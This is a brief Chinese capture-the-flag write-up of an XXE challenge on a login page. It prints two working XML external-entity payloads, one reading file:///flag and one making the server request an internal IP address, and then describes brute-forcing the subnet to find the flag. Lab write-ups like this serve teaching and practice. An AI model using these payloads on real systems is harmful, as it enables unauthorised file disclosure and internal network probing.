打开题目

看到登录口

随便输入admin，123456，然后抓包试一下

先按原来那道题的payload进行测试，payload和结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "file:///flag">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>

未成功获取到flag信息，试着探测内网信息，读取下系统内的配置文件信息看是否能发现有用的信息

这里获得一个新的地址，尝试下进行连接结果如下：

<?xml version="1.0" ?>
<!DOCTYPE llw [
<!ENTITY file SYSTEM  "http://10.244.80.49/">
]>
<user>
    <username>&file;</username>
    <password>1</password>
</user>
 

连接失败，那就查询下同网段内存在不存在其他地址，使用bp的爆破模块进行爆破，设置如下：

扫描可得到flag